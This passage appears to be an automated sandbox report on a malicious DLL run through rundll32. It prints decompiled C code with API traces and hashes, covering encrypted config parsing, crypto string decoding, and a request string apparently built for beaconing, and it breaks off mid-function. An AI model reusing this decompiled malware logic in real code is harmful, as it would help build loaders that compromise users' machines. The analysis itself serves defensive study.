GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,73B75520,00000008,00000014,004F0053,050192FC), ref: 007974ED
HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,73B75520,00000008,00000014,004F0053,050192FC), ref: 0079751A

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
String ID:
API String ID: 1500278894-0
Opcode ID: 88a976b90ff131109ba413df3161a20ee06eefcf9212faacc9d5e602aa56da0f
Instruction ID: 5de55e6abf6e154c92fa36b5e5ef920ccecf54c034623632436a6aa994d5defa
Opcode Fuzzy Hash: 88a976b90ff131109ba413df3161a20ee06eefcf9212faacc9d5e602aa56da0f
Instruction Fuzzy Hash: 3F01D63221020AFBDF21AF58EC49EDA7F79FF84710F004029FA4096161E775D925C750

Uniqueness

Uniqueness Score: -1.00%

Function 00795685, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				signed int _t11;
				void* _t13;

				_t13 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x79a294) == 0) {
						E00795076();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x79a294) == 1) {
						_t10 = E00796B0F(_t11, _a4); // executed
						if(_t10 != 0) {
							_t13 = 0;
						}
					}
				}
				return _t13;
			}

0x0079568c
0x0079568d
0x00795690
0x007956c2
0x007956c4
0x007956c4
0x00795692
0x00795693
0x007956a8
0x007956af
0x007956b1
0x007956b1
0x007956af
0x00795693
0x007956cc

APIs

InterlockedIncrement.KERNEL32(0079A294), ref: 0079569A

Part of subcall function 00796B0F: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00796B24

InterlockedDecrement.KERNEL32(0079A294), ref: 007956BA

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: bbe3709b7b568dcdc4ca987c6c2253b10a5ad153c9a98304eae0d10718ca683e
Instruction ID: 59e11def650fe424c2d39ce7313cc62336adde83efa6687d399d62ef203a49cf
Opcode Fuzzy Hash: bbe3709b7b568dcdc4ca987c6c2253b10a5ad153c9a98304eae0d10718ca683e
Instruction Fuzzy Hash: 28E04F35204A32A79F336B78FD08BAE6750AB53F80B808514B681D1078E61DDC51C7E5

Uniqueness

Uniqueness Score: -1.00%

Function 00794576, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E00794576(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x79a2d4; // 0x487d5a8
				_t4 = _t15 + 0x79b390; // 0x5018938
				_t20 = _t4;
				_t6 = _t15 + 0x79b124; // 0x650047
				_t17 = E00796872(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E00793875(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x00794580
0x00794582
0x00794589
0x0079458a
0x0079458b
0x0079458c
0x00794592
0x00794597
0x00794597
0x007945a1
0x007945b3
0x007945ba
0x007945e9
0x007945bc
0x007945c1
0x007945e6
0x007945c3
0x007945c6
0x007945cd
0x007945d8
0x007945cf
0x007945d2
0x007945d2
0x007945dc
0x007945dc
0x007945c1
0x007945f0

APIs

Part of subcall function 00796872: SysFreeString.OLEAUT32(?), ref: 00796951

Part of subcall function 00793875: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,007971C8,004F0053,00000000,?), ref: 0079387E
Part of subcall function 00793875: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,007971C8,004F0053,00000000,?), ref: 007938A8
Part of subcall function 00793875: memset.NTDLL ref: 007938BC

SysFreeString.OLEAUT32(00000000), ref: 007945DC

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: 8b5c9dcecce4a0c671aa3b857eab3c6260f7945164668b9750494c55bb278b2f
Instruction ID: 234e61da2e9b2094bef8ef0c93405a7dc931e444abff04d2dcb476c2fd54c264
Opcode Fuzzy Hash: 8b5c9dcecce4a0c671aa3b857eab3c6260f7945164668b9750494c55bb278b2f
Instruction Fuzzy Hash: DE01BC32500029FFCF11DFE8EC04CAEBBB8FB08710F014526FA11E2020E3789A669791

Uniqueness

Uniqueness Score: -1.00%

Function 00796837, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00796837(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x79a290, 0, _a4); // executed
				return _t2;
			}

0x00796843
0x00796849

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,00794197), ref: 00796843

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9692e5b78535d98b0ee835e5be16018e8ba2c690e8e0e74b75910e06bc056518
Instruction ID: bfad5c0ef82f7873995075ceabb0fc4ac0d638dd8f41bf8926a56a4451745336
Opcode Fuzzy Hash: 9692e5b78535d98b0ee835e5be16018e8ba2c690e8e0e74b75910e06bc056518
Instruction Fuzzy Hash: AEB01231015100BBDA024B04DF05F097B32B7D0B00F10C016B3040007082360431EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 007950CA, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007950CA(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x79a290, 0, _a4); // executed
				return _t2;
			}

0x007950d6
0x007950dc

APIs

RtlFreeHeap.NTDLL(00000000,00000000,00794239,00000000,00000001,?,00000000,?,?,?,00796B8D,00000000,?,00000001), ref: 007950D6

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 9f07e791034973520890bc1a3892b2939d507f3a820adeb4713101acdad87023
Instruction ID: 2d3d4d516709fc5862fef8b1435128c8e96cb5d113e2bc1b8141f75180316bdb
Opcode Fuzzy Hash: 9f07e791034973520890bc1a3892b2939d507f3a820adeb4713101acdad87023
Instruction Fuzzy Hash: 0BB01271104100FBDB228B04DF04F057B22B7D4B00F00C016B3080007082360421FB1E

Uniqueness

Uniqueness Score: -1.00%

Function 00795384, Relevance: 1.3, APIs: 1, Instructions: 42
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00795384(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
				void* _t24;
				signed short _t25;
				signed int _t27;
				intOrPtr* _t28;
				signed short _t29;

				_t28 = __edi;
				if(_a4 == 0) {
					L2:
					_t29 = E00796A36(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t29 == 0) {
						_t27 = _a12 >> 1;
						if(_t27 == 0) {
							_t29 = 2;
							HeapFree( *0x79a290, 0, _a4);
						} else {
							_t24 = _a4;
							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
							 *_t28 = _t24;
						}
					}
					L6:
					return _t29;
				}
				_t25 = E00794576(_a4, _a8, _a12, __edi); // executed
				_t29 = _t25;
				if(_t29 == 0) {
					goto L6;
				}
				goto L2;
			}

0x00795384
0x0079538c
0x007953a3
0x007953be
0x007953c2
0x007953c7
0x007953c9
0x007953d9
0x007953e5
0x007953cb
0x007953cb
0x007953ce
0x007953d3
0x007953d3
0x007953c9
0x007953eb
0x007953ef
0x007953ef
0x00795398
0x0079539d
0x007953a1
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 00794576: SysFreeString.OLEAUT32(00000000), ref: 007945DC

HeapFree.KERNEL32(00000000,00000000,00000000,80000002,73BCF710,?,00000000,?,00000000,?,00791AF5,?,004F0053,05019308,00000000,?), ref: 007953E5

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: Free$HeapString
String ID:
API String ID: 3806048269-0
Opcode ID: d57a2e48cfa1854216e51624db17823b3e38b72eb456956d3a1fa3159d6b43fd
Instruction ID: 9ba371506677fca42ad97c46e9f35052f74502d93d3edb8c87673e03574e9fe3
Opcode Fuzzy Hash: d57a2e48cfa1854216e51624db17823b3e38b72eb456956d3a1fa3159d6b43fd
Instruction Fuzzy Hash: 8B01E432101A29FBCF239F48EC55EAA7BA5FB04790F048029FE059A160D775D961DB90

Uniqueness

Uniqueness Score: -1.00%

Function 007949FE, Relevance: 1.3, APIs: 1, Instructions: 36
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E007949FE(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E007939C5( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E00796837(_a8 + _a8);
					if(_t21 != 0) {
						E00792E61(_a4, _t21, _t23);
					}
					E007950CA(_a4);
				}
				return _t21;
			}

0x00794a06
0x00794a0d
0x00794a0f
0x00794a1e
0x00794a25
0x00794a34
0x00794a38
0x00794a3f
0x00794a3f
0x00794a47
0x00794a4c
0x00794a51

APIs

lstrlen.KERNEL32(00000000,00000000,007970D9,00000000,?,007962B1,00000000,007970D9,?,00000000,007970D9,00000000,05019630), ref: 00794A0F

Part of subcall function 007939C5: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,00794A23,00000001,007970D9,00000000), ref: 007939FD
Part of subcall function 007939C5: memcpy.NTDLL(00794A23,007970D9,00000010,?,?,?,00794A23,00000001,007970D9,00000000,?,007962B1,00000000,007970D9,?,00000000), ref: 00793A16
Part of subcall function 007939C5: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 00793A3F
Part of subcall function 007939C5: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 00793A57
Part of subcall function 007939C5: memcpy.NTDLL(00000000,00000000,05019630,00000010), ref: 00793AA9

Part of subcall function 00796837: RtlAllocateHeap.NTDLL(00000000,00000000,00794197), ref: 00796843

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
String ID:
API String ID: 894908221-0
Opcode ID: 5455688a6d864705f0c510ea57f0846f3daf91784ae07159d41008d18ab128a6
Instruction ID: a7a4f80755a6e4750bcc4e813e21fe7c499518b652d1f8485e16fa3c9de3684f
Opcode Fuzzy Hash: 5455688a6d864705f0c510ea57f0846f3daf91784ae07159d41008d18ab128a6
Instruction Fuzzy Hash: 4DF03A76100508BACF12AF69EC44DEF3FADEF85364B008022FD188B111DA35DA569BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00791FC2, Relevance: 1.3, APIs: 1, Instructions: 36
sleepCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00791FC2(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}

0x00791fc2
0x00791fcf
0x00791fd0
0x00791fd1
0x00791fd8
0x00792006
0x00792007
0x0079200a
0x00792010
0x00000000
0x00000000
0x00791fef
0x00791ff9
0x00792000
0x00000000
0x00791ff1
0x00791ff4
0x00792014
0x00791ff6
0x00791ff6
0x00000000
0x00791ff6
0x00791ff4
0x0079201b
0x00792021
0x00792021
0x00000000

APIs

Sleep.KERNELBASE(000001F4), ref: 0079200A

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 6cdca58bce2b51176a8dc4498394947f2180f3e50d2ef9ac22e99a3504cfd5fe
Instruction ID: 8bd9adc2640060baf4a9271d66c4aaacb92d4264f8ca67279fc9e4a55c9634e4
Opcode Fuzzy Hash: 6cdca58bce2b51176a8dc4498394947f2180f3e50d2ef9ac22e99a3504cfd5fe
Instruction Fuzzy Hash: 9EF0C975D01219EFDF00EB98D489AEDB7B8FF05304F1080AAE51663241D7B85B85DB61

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00792206, Relevance: 10.7, APIs: 7, Instructions: 204
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E00792206(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t26;
				signed int _t31;
				signed int _t37;
				char* _t43;
				char* _t44;
				char* _t45;
				char* _t46;
				char* _t47;
				void* _t48;
				void* _t49;
				intOrPtr _t50;
				signed int _t56;
				void* _t58;
				void* _t59;
				signed int _t61;
				signed int _t65;
				signed int _t69;
				signed int _t73;
				signed int _t77;
				signed int _t81;
				void* _t86;
				intOrPtr _t102;

				_t87 = __ecx;
				_t26 =  *0x79a2d0; // 0x63699bc3
				if(E00791BCB( &_v8,  &_v12, _t26 ^ 0x8241c5a7) != 0 && _v12 >= 0x110) {
					 *0x79a324 = _v8;
				}
				_t31 =  *0x79a2d0; // 0x63699bc3
				if(E00791BCB( &_v16,  &_v12, _t31 ^ 0x0b822240) == 0) {
					_v12 = 2;
					L50:
					return _v12;
				}
				_t37 =  *0x79a2d0; // 0x63699bc3
				if(E00791BCB( &_v12,  &_v8, _t37 ^ 0xecd84622) == 0) {
					L48:
					HeapFree( *0x79a290, 0, _v16);
					goto L50;
				} else {
					_t86 = _v12;
					if(_t86 == 0) {
						_t43 = 0;
					} else {
						_t81 =  *0x79a2d0; // 0x63699bc3
						_t43 = E007938CE(_t87, _t86, _t81 ^ 0x724e87bc);
					}
					if(_t43 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t43, 0,  &_v8) != 0) {
							 *0x79a298 = _v8;
						}
					}
					if(_t86 == 0) {
						_t44 = 0;
					} else {
						_t77 =  *0x79a2d0; // 0x63699bc3
						_t44 = E007938CE(_t87, _t86, _t77 ^ 0x2b40cc40);
					}
					if(_t44 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t44, 0,  &_v8) != 0) {
							 *0x79a29c = _v8;
						}
					}
					if(_t86 == 0) {
						_t45 = 0;
					} else {
						_t73 =  *0x79a2d0; // 0x63699bc3
						_t45 = E007938CE(_t87, _t86, _t73 ^ 0x3b27c2e6);
					}
					if(_t45 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x79a2a0 = _v8;
						}
					}
					if(_t86 == 0) {
						_t46 = 0;
					} else {
						_t69 =  *0x79a2d0; // 0x63699bc3
						_t46 = E007938CE(_t87, _t86, _t69 ^ 0x0602e249);
					}
					if(_t46 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x79a004 = _v8;
						}
					}
					if(_t86 == 0) {
						_t47 = 0;
					} else {
						_t65 =  *0x79a2d0; // 0x63699bc3
						_t47 = E007938CE(_t87, _t86, _t65 ^ 0x3603764c);
					}
					if(_t47 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x79a02c = _v8;
						}
					}
					if(_t86 == 0) {
						_t48 = 0;
					} else {
						_t61 =  *0x79a2d0; // 0x63699bc3
						_t48 = E007938CE(_t87, _t86, _t61 ^ 0x2cc1f2fd);
					}
					if(_t48 != 0) {
						_push(_t48);
						_t58 = 0x10;
						_t59 = E00793E49(_t58);
						if(_t59 != 0) {
							_push(_t59);
							E007950DF();
						}
					}
					if(_t86 == 0) {
						_t49 = 0;
					} else {
						_t56 =  *0x79a2d0; // 0x63699bc3
						_t49 = E007938CE(_t87, _t86, _t56 ^ 0xb30fc035);
					}
					if(_t49 != 0 && E00793E49(0, _t49) != 0) {
						_t102 =  *0x79a37c; // 0x5019630
						E007910DD(_t102 + 4, _t54);
					}
					_t50 =  *0x79a2d4; // 0x487d5a8
					_t20 = _t50 + 0x79b252; // 0x50187fa
					_t21 = _t50 + 0x79b7b5; // 0x6976612e
					 *0x79a320 = _t20;
					 *0x79a390 = _t21;
					HeapFree( *0x79a290, 0, _t86);
					_v12 = 0;
					goto L48;
				}
			}

0x00792206
0x00792209
0x00792229
0x00792237
0x00792237
0x0079223c
0x00792256
0x0079242a
0x00792431
0x00792438
0x00792438
0x0079225c
0x00792278
0x00792418
0x00792422
0x00000000
0x0079227e
0x0079227e
0x00792283
0x00792299
0x00792285
0x00792285
0x00792292
0x00792292
0x007922a3
0x007922a5
0x007922af
0x007922b4
0x007922b4
0x007922af
0x007922bb
0x007922d1
0x007922bd
0x007922bd
0x007922ca
0x007922ca
0x007922d5
0x007922d7
0x007922e1
0x007922e6
0x007922e6
0x007922e1
0x007922ed
0x00792303
0x007922ef
0x007922ef
0x007922fc
0x007922fc
0x00792307
0x00792309
0x00792313
0x00792318
0x00792318
0x00792313
0x0079231f
0x00792335
0x00792321
0x00792321
0x0079232e
0x0079232e
0x00792339
0x0079233b
0x00792345
0x0079234a
0x0079234a
0x00792345
0x00792351
0x00792367
0x00792353
0x00792353
0x00792360
0x00792360
0x0079236b
0x0079236d
0x00792377
0x0079237c
0x0079237c
0x00792377
0x00792383
0x00792399
0x00792385
0x00792385
0x00792392
0x00792392
0x0079239d
0x0079239f
0x007923a2
0x007923a3
0x007923aa
0x007923ac
0x007923ad
0x007923ad
0x007923aa
0x007923b4
0x007923ca
0x007923b6
0x007923b6
0x007923c3
0x007923c3
0x007923ce
0x007923dc
0x007923e6
0x007923e6
0x007923eb
0x007923f1
0x007923fe
0x00792404
0x0079240a
0x0079240f
0x00792415
0x00000000
0x00792415

APIs

StrToIntExA.SHLWAPI(00000000,00000000,007955D3,?,007955D3,63699BC3,?,?,63699BC3,007955D3,?,63699BC3,E8FA7DD7,0079A00C,745EC740), ref: 007922AB
StrToIntExA.SHLWAPI(00000000,00000000,007955D3,?,007955D3,63699BC3,?,?,63699BC3,007955D3,?,63699BC3,E8FA7DD7,0079A00C,745EC740), ref: 007922DD
StrToIntExA.SHLWAPI(00000000,00000000,007955D3,?,007955D3,63699BC3,?,?,63699BC3,007955D3,?,63699BC3,E8FA7DD7,0079A00C,745EC740), ref: 0079230F
StrToIntExA.SHLWAPI(00000000,00000000,007955D3,?,007955D3,63699BC3,?,?,63699BC3,007955D3,?,63699BC3,E8FA7DD7,0079A00C,745EC740), ref: 00792341
StrToIntExA.SHLWAPI(00000000,00000000,007955D3,?,007955D3,63699BC3,?,?,63699BC3,007955D3,?,63699BC3,E8FA7DD7,0079A00C,745EC740), ref: 00792373
HeapFree.KERNEL32(00000000,?,?,007955D3,63699BC3,?,?,63699BC3,007955D3,?,63699BC3,E8FA7DD7,0079A00C,745EC740), ref: 0079240F
HeapFree.KERNEL32(00000000,?,?,007955D3,63699BC3,?,?,63699BC3,007955D3,?,63699BC3,E8FA7DD7,0079A00C,745EC740), ref: 00792422

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 6ca369b16f77e1947357471b09939a82a3f8a260bf2f3eb0892c0ffbd0421e81
Instruction ID: 6daf24d76b77bbfb0c9d3619c70d94d6b5ee0b1dbc55bddbbf8c107de2f09bdb
Opcode Fuzzy Hash: 6ca369b16f77e1947357471b09939a82a3f8a260bf2f3eb0892c0ffbd0421e81
Instruction Fuzzy Hash: 6A618171A04204FBCF11EBB9ED88C5F77ADBB88700B244916B502D3112EA3DDE42DB65

Uniqueness

Uniqueness Score: -1.00%

Function 6D489540, Relevance: 6.1, APIs: 4, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 6D489557
_wcscmp.LIBCMT ref: 6D489568
GetLocaleInfoW.KERNEL32(000000B8,2000000B,?,00000002,?,?,6D48979C,?,00000000), ref: 6D489584
GetLocaleInfoW.KERNEL32(000000B8,20001004,?,00000002,?,?,6D48979C,?,00000000), ref: 6D4895AE

Memory Dump Source

Source File: 00000003.00000002.925622775.000000006D47E000.00000020.00020000.sdmp, Offset: 6D47E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d47e000_rundll32.jbxd

Similarity

API ID: InfoLocale_wcscmp
String ID:
API String ID: 1351282208-0
Opcode ID: d95e69a903180dc08bb2a7bf8e5ad0225f87dd586a4b0f5be59a13a417107511
Instruction ID: e3d3fdd82839ad5addae8441886cde90ea15ca66919131aa2f78a2ffcecbb997
Opcode Fuzzy Hash: d95e69a903180dc08bb2a7bf8e5ad0225f87dd586a4b0f5be59a13a417107511
Instruction Fuzzy Hash: 8E017937605616FBEB029E55EC84FDA77B8AF097D5F108029F908DA242E731DE8187D4

Uniqueness

Uniqueness Score: -1.00%

Function 00796EFC, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 220
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00796EFC(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				void* _v24;
				intOrPtr _v40;
				void* __ecx;
				void* __edi;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t39;
				int _t42;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				intOrPtr _t78;
				intOrPtr _t81;
				intOrPtr _t84;
				int _t87;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t92;
				int _t95;
				void* _t98;
				void* _t99;
				void* _t103;
				intOrPtr _t105;
				long _t107;
				intOrPtr _t108;
				intOrPtr* _t109;
				long _t110;
				int _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;

				_t103 = __edx;
				_t110 = __eax;
				_v8 = 8;
				_t117 = RtlAllocateHeap( *0x79a290, 0, 0x800);
				if(_t117 != 0) {
					if(_t110 == 0) {
						_t110 = GetTickCount();
					}
					_t31 =  *0x79a018; // 0x5a1b6391
					asm("bswap eax");
					_t32 =  *0x79a014; // 0x5cb11ae7
					asm("bswap eax");
					_t33 =  *0x79a010; // 0x15dc9586
					asm("bswap eax");
					_t34 =  *0x79a00c; // 0x67522d90
					asm("bswap eax");
					_t35 =  *0x79a2d4; // 0x487d5a8
					_t2 = _t35 + 0x79b613; // 0x74666f73
					_t111 = wsprintfA(_t117, _t2, 2, 0x3d15c, _t34, _t33, _t32, _t31,  *0x79a02c,  *0x79a004, _t110);
					_t38 = E00796A09();
					_t39 =  *0x79a2d4; // 0x487d5a8
					_t3 = _t39 + 0x79b653; // 0x74707526
					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
					_t120 = _t118 + 0x38;
					_t112 = _t111 + _t42;
					if(_a12 != 0) {
						_t92 =  *0x79a2d4; // 0x487d5a8
						_t7 = _t92 + 0x79b65e; // 0x732526
						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
						_t120 = _t120 + 0xc;
						_t112 = _t112 + _t95;
					}
					_t43 = E00795040(_t99);
					_t44 =  *0x79a2d4; // 0x487d5a8
					_t9 = _t44 + 0x79b302; // 0x6d697426
					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
					_t48 =  *0x79a2d4; // 0x487d5a8
					_t11 = _t48 + 0x79b2d7; // 0x74636126
					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
					_t52 =  *0x79a32c; // 0x50195b0
					_t121 = _t120 + 0x1c;
					if(_t52 != 0) {
						_t88 =  *0x79a2d4; // 0x487d5a8
						_t13 = _t88 + 0x79b676; // 0x73797326
						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t91;
					}
					_t105 =  *0x79a37c; // 0x5019630
					_a28 = E00792885(0x79a00a, _t105 + 4);
					_t55 =  *0x79a31c; // 0x50195e0
					_t107 = 0;
					if(_t55 != 0) {
						_t84 =  *0x79a2d4; // 0x487d5a8
